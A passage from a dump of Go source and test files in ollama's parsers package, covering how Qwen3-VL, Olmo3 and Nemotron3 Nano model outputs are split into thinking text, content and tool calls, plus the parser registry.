parameters", tools: []api.Tool{}, rawToolCall: `{"name": "获取天气", "arguments": {"城市": "北京", "message": "Hello! 你好! 🌟 مرحبا"}}`, wantToolCall: api.ToolCall{ Function: api.ToolCallFunction{ Name: "获取天气", Arguments: testArgs(map[string]any{ "城市": "北京", "message": "Hello! 你好! 🌟 مرحبا", }), }, }, }, } for i, step := range steps { gotToolCall, err := parseJSONToolCall(qwenEventRawToolCall{raw: step.rawToolCall}, step.tools) if err != nil { t.Errorf("step %d (%s): %v", i, step.name, err) } if !toolCallEqual(gotToolCall, step.wantToolCall) { t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall) } } } func TestQwen3VLParserState(t *testing.T) { cases := []struct { desc string hasThinking bool last *api.Message wantState qwenParserState }{ { desc: "no thinking support => CollectingContent", hasThinking: false, last: nil, wantState: CollectingContent, }, { desc: "thinking support, no last message => CollectingThinkingContent", hasThinking: true, last: nil, wantState: CollectingThinkingContent, }, { desc: "thinking support, last assistant with empty content => CollectingThinkingContent", hasThinking: true, last: &api.Message{Role: "assistant", Content: ""}, wantState: CollectingThinkingContent, }, { desc: "thinking support, last assistant with content => CollectingContent", hasThinking: true, last: &api.Message{Role: "assistant", Content: "hello"}, wantState: CollectingContent, }, { desc: "thinking support, last is user => CollectingThinkingContent", hasThinking: true, last: &api.Message{Role: "user", Content: "hi"}, wantState: CollectingThinkingContent, }, } for _, tc := range cases { parser := Qwen3VLParser{hasThinkingSupport: tc.hasThinking} parser.Init(nil, tc.last, nil) if parser.state != tc.wantState { t.Errorf("%s: got state %v, want %v", tc.desc, parser.state, tc.wantState) } } } func TestQwen3VLThinkingParserWithThinkingPrefill(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "thinking prefill", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, }, }, { desc: "thinking prefill with content", steps: []step{ {input: "abc</th", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: "ink> def", wantEvents: []qwenEvent{qwenEventContent{content: "def"}}}, }, }, { desc: "thinking prefill with fakeout", steps: []step{ {input: "abc</think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: " fakeout </think", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "</think fakeout"}}}, {input: ">", wantEvents: []qwenEvent{}}, }, }, { desc: "thinking prefill with spaces", steps: []step{ {input: " </think> starting content", wantEvents: []qwenEvent{qwenEventContent{content: "starting content"}}}, }, }, } last := &api.Message{Role: "assistant", Thinking: "i am thinking"} // so if there is thinking the test is still thinking for _, tc := range cases { t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingParserWithNonThinkingPrefill(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "thinking prefill", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think>"}}}, }, }, { desc: "thinking prefill with content", steps: []step{ {input: "abc</th", wantEvents: []qwenEvent{qwenEventContent{content: "abc</th"}}}, {input: "ink> def", wantEvents: []qwenEvent{qwenEventContent{content: "ink> def"}}}, }, }, { desc: "thinking prefill with fakeout", steps: []step{ {input: "abc</think", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think"}}}, {input: " fakeout </think", wantEvents: []qwenEvent{qwenEventContent{content: " fakeout </think"}}}, {input: ">", wantEvents: []qwenEvent{qwenEventContent{content: ">"}}}, }, }, { desc: "thinking prefill with spaces", steps: []step{ {input: " </think> starting content", wantEvents: []qwenEvent{qwenEventContent{content: " </think> starting content"}}}, }, }, } last := &api.Message{Role: "assistant", Thinking: "i am thinking", Content: "i am content"} // so if there is thinking the test is still thinking for _, tc := range cases { t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { // avoid deep equal on empty vs. nil slices continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLThinkingParserStreamingAssistantPrefillContent(t *testing.T) { // last message is assistant with content ⇒ start in CollectingContent last := &api.Message{Role: "assistant", Content: "has content"} parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, last, nil) type step struct { input string wantEvents []qwenEvent } steps := []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventContent{content: "abc</think>"}}}, {input: "<tool_call>{\"name\": \"x\", \"arguments\": {}}</tool_call>", wantEvents: []qwenEvent{qwenEventRawToolCall{raw: "{\"name\": \"x\", \"arguments\": {}}"}}}, } for i, s := range steps { parser.buffer.WriteString(s.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(s.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, s.wantEvents) { t.Fatalf("step %d: input %q: got %#v, want %#v", i, s.input, gotEvents, s.wantEvents) } } } func TestQwen3VLThinkingWhitespaceHandling(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "whitespace after thinking tag is trimmed", steps: []step{ { input: "thinking content</think> \n\t content starts here", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking content"}, qwenEventContent{content: "content starts here"}, }, }, }, }, { desc: "whitespace after thinking tag split across chunks", steps: []step{ { input: "thinking content</think> ", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking content"}}, }, { input: " \n\t", wantEvents: []qwenEvent{}, }, { input: "content", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "only whitespace after thinking tag", steps: []step{ { input: "thinking content</think> \n\t ", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking content"}}, }, }, }, { desc: "multiple spaces and tabs after thinking", steps: []step{ { input: "think</think> \t\t\n\n text", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "think"}, qwenEventContent{content: "text"}, }, }, }, }, { desc: "trailing whitespace before thinking tag is preserved in content", steps: []step{ { input: "thinking with spaces </think>text", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking with spaces"}, qwenEventContent{content: "text"}, }, }, }, }, { desc: "whitespace between thinking and tool call", steps: []step{ { input: "thinking</think> \n <tool_call>{\"name\":\"test\"}</tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventRawToolCall{raw: "{\"name\":\"test\"}"}, }, }, }, }, { desc: "no whitespace after thinking tag", steps: []step{ { input: "thinking</think>content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventContent{content: "content"}, }, }, }, }, { desc: "unicode whitespace after thinking tag", steps: []step{ { input: "thinking</think>\u00a0\u3000content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventContent{content: "content"}, }, }, }, }, { desc: "whitespace split with partial thinking tag", steps: []step{ { input: "thinking</th", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "thinking"}}, }, { input: "ink> \n", wantEvents: []qwenEvent{}, }, { input: " content", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "empty thinking tag with whitespace after", steps: []step{ { input: "</think> \ncontent", wantEvents: []qwenEvent{ qwenEventContent{content: "content"}, }, }, }, }, { desc: "whitespace inside tool call preserves trailing space", steps: []step{ { input: "bruh</think> \n \n \n \n \n \n blahhhhhhhhhh blahhhh blahhhh \n\n\n\t\t <tool_call> tool content </tool_call> \n\n\n\n\n\n\n after", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "bruh"}, qwenEventContent{content: "blahhhhhhhhhh blahhhh blahhhh"}, qwenEventRawToolCall{raw: " tool content "}, qwenEventContent{content: "after"}, }, }, }, }, { desc: "whitespace inside tool call preserves trailing space", steps: []step{ { input: "bruh</think> shdjfhksdhfj ", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "bruh"}, qwenEventContent{content: "shdjfhksdhfj"}, }, }, { input: "another word ", wantEvents: []qwenEvent{ qwenEventContent{content: " another word"}, }, }, { input: "<tool_call> tool content </tool_call> ", wantEvents: []qwenEvent{ qwenEventRawToolCall{raw: " tool content "}, }, }, { input: "\n \n \n \n \n \n blahhhhhhhhhh blahhhh blahhhh \n\n\n\t\t <tool_call> anotha one </tool_call> \n\n\n\n\n\n\n after \n\n\n\n\n\n blep", wantEvents: []qwenEvent{ qwenEventContent{content: "blahhhhhhhhhh blahhhh blahhhh"}, qwenEventRawToolCall{raw: " anotha one "}, qwenEventContent{content: "after \n\n\n\n\n\n blep"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, nil, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } } func TestQwen3VLToolCallWhitespaceHandling(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool prefillMsg *api.Message // allows starting in content mode instead of thinking mode }{ { desc: "whitespace inside tool call is fully preserved (with content prefill)", prefillMsg: &api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "before<tool_call> tool content </tool_call> \n after", wantEvents: []qwenEvent{ qwenEventContent{content: "before"}, qwenEventRawToolCall{raw: " tool content "}, qwenEventContent{content: "after"}, }, }, }, }, { desc: "whitespace after tool call trimmed across chunks (with content prefill)", prefillMsg: &api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "before<tool_call>tool</tool_call> ", wantEvents: []qwenEvent{ qwenEventContent{content: "before"}, qwenEventRawToolCall{raw: "tool"}, }, }, { input: "\n\t", wantEvents: []qwenEvent{}, }, { input: "after \n this is a song", wantEvents: []qwenEvent{ qwenEventContent{content: "after \n this is a song"}, }, }, }, }, { desc: "multiple tool calls with whitespace between (with content prefill)", prefillMsg: &api.Message{Role: "assistant", Content: "prefill"}, steps: []step{ { input: "<tool_call>first</tool_call> \n <tool_call>second</tool_call>", wantEvents: []qwenEvent{ qwenEventRawToolCall{raw: "first"}, qwenEventRawToolCall{raw: "second"}, }, }, }, }, { desc: "thinking with whitespace then tool call", steps: []step{ { input: "thinking</think> \n <tool_call>tool</tool_call> \n content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "thinking"}, qwenEventRawToolCall{raw: "tool"}, qwenEventContent{content: "content"}, }, }, }, }, } anyOnlies := false for _, tc := range cases { if tc.only { anyOnlies = true } } for _, tc := range cases { if anyOnlies && !tc.only { continue } t.Run(tc.desc, func(t *testing.T) { parser := Qwen3VLParser{hasThinkingSupport: true} parser.Init([]api.Tool{}, tc.prefillMsg, nil) for i, step := range tc.steps { parser.buffer.WriteString(step.input) gotEvents := parser.parseEvents() if len(gotEvents) == 0 && len(step.wantEvents) == 0 { continue } if !reflect.DeepEqual(gotEvents, step.wantEvents) { t.Errorf("step %d: input %q: got events %#v, want %#v", i, step.input, gotEvents, step.wantEvents) } } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/parsers.go
model/parsers/parsers.go
package parsers import ( "strings" "unicode" "github.com/ollama/ollama/api" "github.com/ollama/ollama/harmony" ) type Parser interface { // Init initializes the parser with tools, optional last message for chat prefill, and think value // Returns processed tools if the parser needs to modify them (e.g., harmony renames them) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool // Add processes streamed content and returns parsed content, thinking, and tool calls // The done flag indicates if this is the last chunk (used for draining accumulators) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) HasToolSupport() bool HasThinkingSupport() bool } type ParserConstructor func() Parser type ParserRegistry struct { constructors map[string]ParserConstructor } func (r *ParserRegistry) Register(name string, constructor ParserConstructor) { r.constructors[name] = constructor } var registry = ParserRegistry{ constructors: make(map[string]ParserConstructor), } func Register(name string, constructor ParserConstructor) { registry.Register(name, constructor) } func ParserForName(name string) Parser { if parser, ok := registry.constructors[name]; ok { return parser() } var p Parser switch name { case "qwen3-coder": p = &Qwen3CoderParser{} case "qwen3-vl-instruct": p = &Qwen3VLParser{hasThinkingSupport: false} case "qwen3-vl-thinking": p = &Qwen3VLParser{hasThinkingSupport: true} case "ministral": p = &MinistralParser{hasThinkingSupport: false} case "passthrough": return &PassthroughParser{} case "harmony": return harmony.NewHarmonyMessageHandler() case "cogito": return &CogitoParser{} case "deepseek3": return &DeepSeek3Parser{hasThinkingSupport: true} case "olmo3": return &Olmo3Parser{} case "olmo3-think": return &Olmo3ThinkParser{} case "nemotron-3-nano": return &Nemotron3NanoParser{} case "functiongemma": return &FunctionGemmaParser{} default: return nil } return p } type PassthroughParser struct{} func (p *PassthroughParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { return tools // passthrough doesn't modify tools } func (p *PassthroughParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { return s, "", nil, nil } func (p *PassthroughParser) HasToolSupport() bool { return false } func (p *PassthroughParser) HasThinkingSupport() bool { return false } func splitAtTag(sb *strings.Builder, tag string, trimAfter bool) (string, string) { split := strings.SplitN(sb.String(), tag, 2) if len(split) == 1 { sb.Reset() return split[0], "" } before := split[0] before = strings.TrimRightFunc(before, unicode.IsSpace) after := split[1] if trimAfter { after = strings.TrimLeftFunc(after, unicode.IsSpace) } sb.Reset() sb.WriteString(after) return before, after // return events }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3_think_test.go
model/parsers/olmo3_think_test.go
package parsers import ( "strings" "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestOlmo3ThinkParser(t *testing.T) { tests := []struct { name string input string expectedContent string expectedThinking string lastMessage *api.Message }{ { name: "thinking_only", input: "I need to think about this.</think>Here is my response.", expectedContent: "Here is my response.", expectedThinking: "I need to think about this.", }, { name: "thinking_with_newlines", input: "Let me think step by step.\n\n1. First point\n2. Second point</think>The answer is 42.", expectedContent: "The answer is 42.", expectedThinking: "Let me think step by step.\n\n1. First point\n2. Second point", }, { name: "thinking_then_content", input: "Deep thinking here.</think>Here is my detailed response with multiple sentences. I have thought carefully.", expectedContent: "Here is my detailed response with multiple sentences. I have thought carefully.", expectedThinking: "Deep thinking here.", }, { name: "empty_thinking", input: "</think>Just content here.", expectedContent: "Just content here.", expectedThinking: "", }, { name: "prefill_skips_thinking", input: "Continuing from previous content.", expectedContent: "Continuing from previous content.", lastMessage: &api.Message{ Role: "assistant", Content: "Previous content", }, }, { name: "thinking_with_whitespace", input: " Some thinking </think> Content here ", expectedContent: "Content here ", expectedThinking: " Some thinking", }, { name: "real_model_output_with_newlines", input: "Yes, that should work. Let me go with that response.\n\n</think>\n\nHi! I'm all set and ready to assist. How about you? How are you today? 😊", expectedThinking: "Yes, that should work. Let me go with that response.", expectedContent: "Hi! I'm all set and ready to assist. How about you? How are you today? 😊", }, // Edge cases { name: "nested_think_tags_in_thinking", input: "I'm thinking <think>nested</think> more thinking</think>Final content.", expectedContent: "more thinking</think>Final content.", expectedThinking: "I'm thinking <think>nested", }, { name: "multiple_think_close_tags", input: "First thinking</think>Content</think>More content.", expectedContent: "Content</think>More content.", expectedThinking: "First thinking", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, tt.lastMessage, nil) content, thinking, toolCalls, err := parser.Add(tt.input, true) if err != nil { t.Fatalf("Add() error = %v", err) } if diff := cmp.Diff(tt.expectedContent, content); diff != "" { t.Errorf("content mismatch (-want +got):\n%s", diff) } if diff := cmp.Diff(tt.expectedThinking, thinking); diff != "" { t.Errorf("thinking mismatch (-want +got):\n%s", diff) } // No tool calls expected if len(toolCalls) > 0 { t.Errorf("expected no tool calls, got %d", len(toolCalls)) } }) } } func TestOlmo3ThinkParser_Streaming(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, nil, nil) chunks := []string{ "I am ", "thinking about", " this.</think>Here ", "is the response.", } var finalContent, finalThinking strings.Builder for i, chunk := range chunks { done := i == len(chunks)-1 content, thinking, _, err := parser.Add(chunk, done) if err != nil { t.Fatalf("Add() error on chunk %d: %v", i, err) } finalContent.WriteString(content) finalThinking.WriteString(thinking) } expectedContent := "Here is the response." expectedThinking := "I am thinking about this." if finalContent.String() != expectedContent { t.Errorf("expected content %q, got %q", expectedContent, finalContent.String()) } if finalThinking.String() != expectedThinking { t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String()) } } func TestOlmo3ThinkParser_StreamingEdgeCases(t *testing.T) { tests := []struct { name string chunks []string expectedContent string expectedThinking string }{ { name: "thinking_tag_split_across_chunks", chunks: []string{ "This is thinking content", "</think>", "This is content.", }, expectedContent: "This is content.", expectedThinking: "This is thinking content", }, { name: "thinking_tag_split_mid_token", chunks: []string{ "Thinking?</", "think>", "Content here.", }, expectedContent: "Content here.", expectedThinking: "Thinking?", }, { name: "thinking_tag_split_at_angle_bracket", chunks: []string{ "Thinking<", "/think>", "Content.", }, expectedContent: "Content.", expectedThinking: "Thinking", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, nil, nil) var finalContent, finalThinking strings.Builder for i, chunk := range tt.chunks { done := i == len(tt.chunks)-1 content, thinking, _, err := parser.Add(chunk, done) if err != nil { t.Fatalf("Add() error on chunk %d: %v", i, err) } finalContent.WriteString(content) finalThinking.WriteString(thinking) } if finalContent.String() != tt.expectedContent { t.Errorf("expected content %q, got %q", tt.expectedContent, finalContent.String()) } if finalThinking.String() != tt.expectedThinking { t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String()) } }) } } // TestOlmo3ThinkParser_ThinkBoundary tests streaming thinking content // where thinking chunks come in succession before the </think> tag func TestOlmo3ThinkParser_ThinkBoundary(t *testing.T) { tests := []struct { name string chunks []string expectedThinking string expectedContent string }{ { name: "multiple_thinking_chunks", chunks: []string{ "First part of thinking. ", "Second part of thinking. ", "Third part.</think>", "Content here.", }, expectedThinking: "First part of thinking. Second part of thinking. Third part.", expectedContent: "Content here.", }, { name: "thinking_chunks_with_newlines", chunks: []string{ "Step 1: Analyze the problem.\n", "Step 2: Consider options.\n", "Step 3: Make decision.</think>", "Here is my answer.", }, expectedThinking: "Step 1: Analyze the problem.\nStep 2: Consider options.\nStep 3: Make decision.", expectedContent: "Here is my answer.", }, { name: "single_char_thinking_chunks", chunks: []string{ "H", "e", "l", "l", "o", "</think>", "World", }, expectedThinking: "Hello", expectedContent: "World", }, { name: "thinking_with_special_chars", chunks: []string{ "Let me think... ", "Option A: $100 ", "Option B: €200</think>", "I recommend Option A.", }, expectedThinking: "Let me think... Option A: $100 Option B: €200", expectedContent: "I recommend Option A.", }, { name: "long_thinking_multiple_chunks", chunks: []string{ "This is a very long thinking process. ", "I need to consider many factors. ", "First, let me look at the data. ", "The numbers show interesting patterns. ", "Based on my analysis, ", "I can conclude that...</think>", "The answer is 42.", }, expectedThinking: "This is a very long thinking process. I need to consider many factors. First, let me look at the data. The numbers show interesting patterns. Based on my analysis, I can conclude that...", expectedContent: "The answer is 42.", }, { name: "thinking_ends_exactly_at_chunk_boundary", chunks: []string{ "Thinking content", "</think>", "Content", }, expectedThinking: "Thinking content", expectedContent: "Content", }, { name: "empty_chunks_between_thinking", chunks: []string{ "Start thinking", "", " middle ", "", "end</think>", "Content", }, expectedThinking: "Start thinking middle end", expectedContent: "Content", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, nil, nil) var finalContent, finalThinking strings.Builder for i, chunk := range tt.chunks { done := i == len(tt.chunks)-1 content, thinking, _, err := parser.Add(chunk, done) if err != nil { t.Fatalf("Add() error on chunk %d: %v", i, err) } finalContent.WriteString(content) finalThinking.WriteString(thinking) } if finalThinking.String() != tt.expectedThinking { t.Errorf("thinking mismatch:\nexpected: %q\ngot: %q", tt.expectedThinking, finalThinking.String()) } if finalContent.String() != tt.expectedContent { t.Errorf("content mismatch:\nexpected: %q\ngot: %q", tt.expectedContent, finalContent.String()) } }) } } // TestOlmo3ThinkParser_StateTransitions tests that state transitions work correctly func TestOlmo3ThinkParser_StateTransitions(t *testing.T) { t.Run("thinking_to_content", func(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, nil, nil) if parser.state != olmo3CollectingThink { t.Errorf("initial state should be olmo3CollectingThink, got %v", parser.state) } parser.Add("thinking</think>content", true) if parser.state != olmo3CollectingContent { t.Errorf("state after </think> should be olmo3CollectingContent, got %v", parser.state) } }) } func TestOlmo3ThinkParser_HasToolSupport(t *testing.T) { parser := &Olmo3ThinkParser{} if parser.HasToolSupport() { t.Error("Olmo3ThinkParser should NOT support tools") } } func TestOlmo3ThinkParser_HasThinkingSupport(t *testing.T) { parser := &Olmo3ThinkParser{} if !parser.HasThinkingSupport() { t.Error("Olmo3ThinkParser should support thinking") } } func TestOlmo3ThinkParser_Init(t *testing.T) { parser := &Olmo3ThinkParser{} tools := []api.Tool{ {Function: api.ToolFunction{Name: "test_tool"}}, } lastMessage := &api.Message{Role: "assistant", Content: "previous"} returnedTools := parser.Init(tools, lastMessage, nil) if len(returnedTools) != len(tools) { t.Errorf("expected %d tools returned, got %d", len(tools), len(returnedTools)) } // Should be in content collection mode due to prefill if parser.state != olmo3CollectingContent { t.Errorf("expected state olmo3CollectingContent, got %v", parser.state) } } func TestOlmo3ThinkParser_InitWithoutPrefill(t *testing.T) { parser := &Olmo3ThinkParser{} parser.Init(nil, nil, nil) // Should be in thinking collection mode (model always thinks first) if parser.state != olmo3CollectingThink { t.Errorf("expected state olmo3CollectingThink, got %v", parser.state) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/nemotron3nano_test.go
model/parsers/nemotron3nano_test.go
package parsers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestNemotron3NanoParser(t *testing.T) { tests := []struct { name string input string thinkValue *api.ThinkValue expectedContent string expectedThinking string expectedCalls []api.ToolCall }{ { name: "simple content - no thinking", input: "Hello, how can I help you?", thinkValue: nil, expectedContent: "Hello, how can I help you?", }, { name: "simple content - thinking disabled", input: "Hello, how can I help you?", thinkValue: &api.ThinkValue{Value: false}, expectedContent: "Hello, how can I help you?", }, { name: "thinking then content", input: "Let me think about this...</think>\nHere is my answer.", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Let me think about this...", expectedContent: "Here is my answer.", }, { name: "thinking with newlines", input: "Step 1: Analyze\nStep 2: Process\nStep 3: Conclude</think>\nThe answer is 42.", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Step 1: Analyze\nStep 2: Process\nStep 3: Conclude", expectedContent: "The answer is 42.", }, { name: "simple tool call", input: "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, { name: "content then tool call", input: "Let me check the weather.\n<tool_call>\n<function=get_weather>\n<parameter=city>\nNYC\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedContent: "Let me check the weather.", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "NYC"}), }, }, }, }, { name: "tool call with multiple parameters", input: "<tool_call>\n<function=book_flight>\n<parameter=from>\nSFO\n</parameter>\n<parameter=to>\nNYC\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "book_flight", Arguments: testArgs(map[string]any{ "from": "SFO", "to": "NYC", }), }, }, }, }, { name: "multiple tool calls", input: "<tool_call>\n<function=get_weather>\n<parameter=city>\nSan Francisco\n</parameter>\n</function>\n</tool_call>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nNew York\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "San Francisco"}), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "New York"}), }, }, }, }, { name: "thinking then tool call", input: "I should check the weather...</think>\n<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "I should check the weather...", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, { name: "thinking content then tool call", input: "Let me think...</think>\nI'll check for you.\n<tool_call>\n<function=search>\n<parameter=query>\ntest\n</parameter>\n</function>\n</tool_call>", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Let me think...", expectedContent: "I'll check for you.", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "search", Arguments: testArgs(map[string]any{"query": "test"}), }, }, }, }, { name: "tool call with multiline parameter value", input: "<tool_call>\n<function=create_note>\n<parameter=content>\nLine 1\nLine 2\nLine 3\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "create_note", Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}), }, }, }, }, { name: "empty thinking block - immediate close", input: "</think>\nHere is my answer.", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "", expectedContent: "Here is my answer.", }, { name: "thinking disabled but model outputs think close anyway", input: "</think>\nSome content after spurious tag.", thinkValue: &api.ThinkValue{Value: false}, expectedContent: "</think>\nSome content after spurious tag.", }, { name: "tool call with no function name - returns empty tool call", input: "<tool_call>\n<function=>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}}, }, { name: "content with newlines preserved", input: "Line 1\n\nLine 2\n\n\nLine 3", thinkValue: nil, expectedContent: "Line 1\n\nLine 2\n\n\nLine 3", }, { name: "thinking with only whitespace after close tag", input: "My thoughts...</think> \n\t\n Content here.", thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "My thoughts...", expectedContent: "Content here.", }, { name: "unicode content", input: "Hello 世界! 🌍 Ñoño", thinkValue: nil, expectedContent: "Hello 世界! 🌍 Ñoño", }, { name: "tool call with numeric parameter", input: "<tool_call>\n<function=set_temp>\n<parameter=value>\n42\n</parameter>\n</function>\n</tool_call>", thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "set_temp", Arguments: testArgs(map[string]any{"value": "42"}), }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { p := &Nemotron3NanoParser{} p.Init(nil, nil, tt.thinkValue) content, thinking, calls, err := p.Add(tt.input, false) if err != nil { t.Fatalf("unexpected error: %v", err) } // Drain remaining content finalContent, finalThinking, finalCalls, err := p.Add("", true) if err != nil { t.Fatalf("unexpected error on done: %v", err) } content += finalContent thinking += finalThinking calls = append(calls, finalCalls...) if diff := cmp.Diff(content, tt.expectedContent); diff != "" { t.Errorf("content mismatch (-got +want):\n%s", diff) } if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" { t.Errorf("thinking mismatch (-got +want):\n%s", diff) } if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" { t.Errorf("calls mismatch (-got +want):\n%s", diff) } }) } } func TestNemotron3NanoParser_Streaming(t *testing.T) { tests := []struct { name string chunks []string thinkValue *api.ThinkValue expectedContent string expectedThinking string expectedCalls []api.ToolCall }{ { name: "streaming content character by character", chunks: []string{"H", "e", "l", "l", "o", ",", " ", "w", "o", "r", "l", "d", "!"}, thinkValue: nil, expectedContent: "Hello, world!", }, { name: "streaming content small tokens", chunks: []string{"Hel", "lo", ", ", "how ", "can", " I", " help", " you", " today", "?"}, thinkValue: nil, expectedContent: "Hello, how can I help you today?", }, { name: "streaming thinking then content - granular", chunks: []string{"Let", " me", " th", "ink", " about", " this", "...", "<", "/", "think", ">", "\n", "Here", " is", " my", " answer", "."}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Let me think about this...", expectedContent: 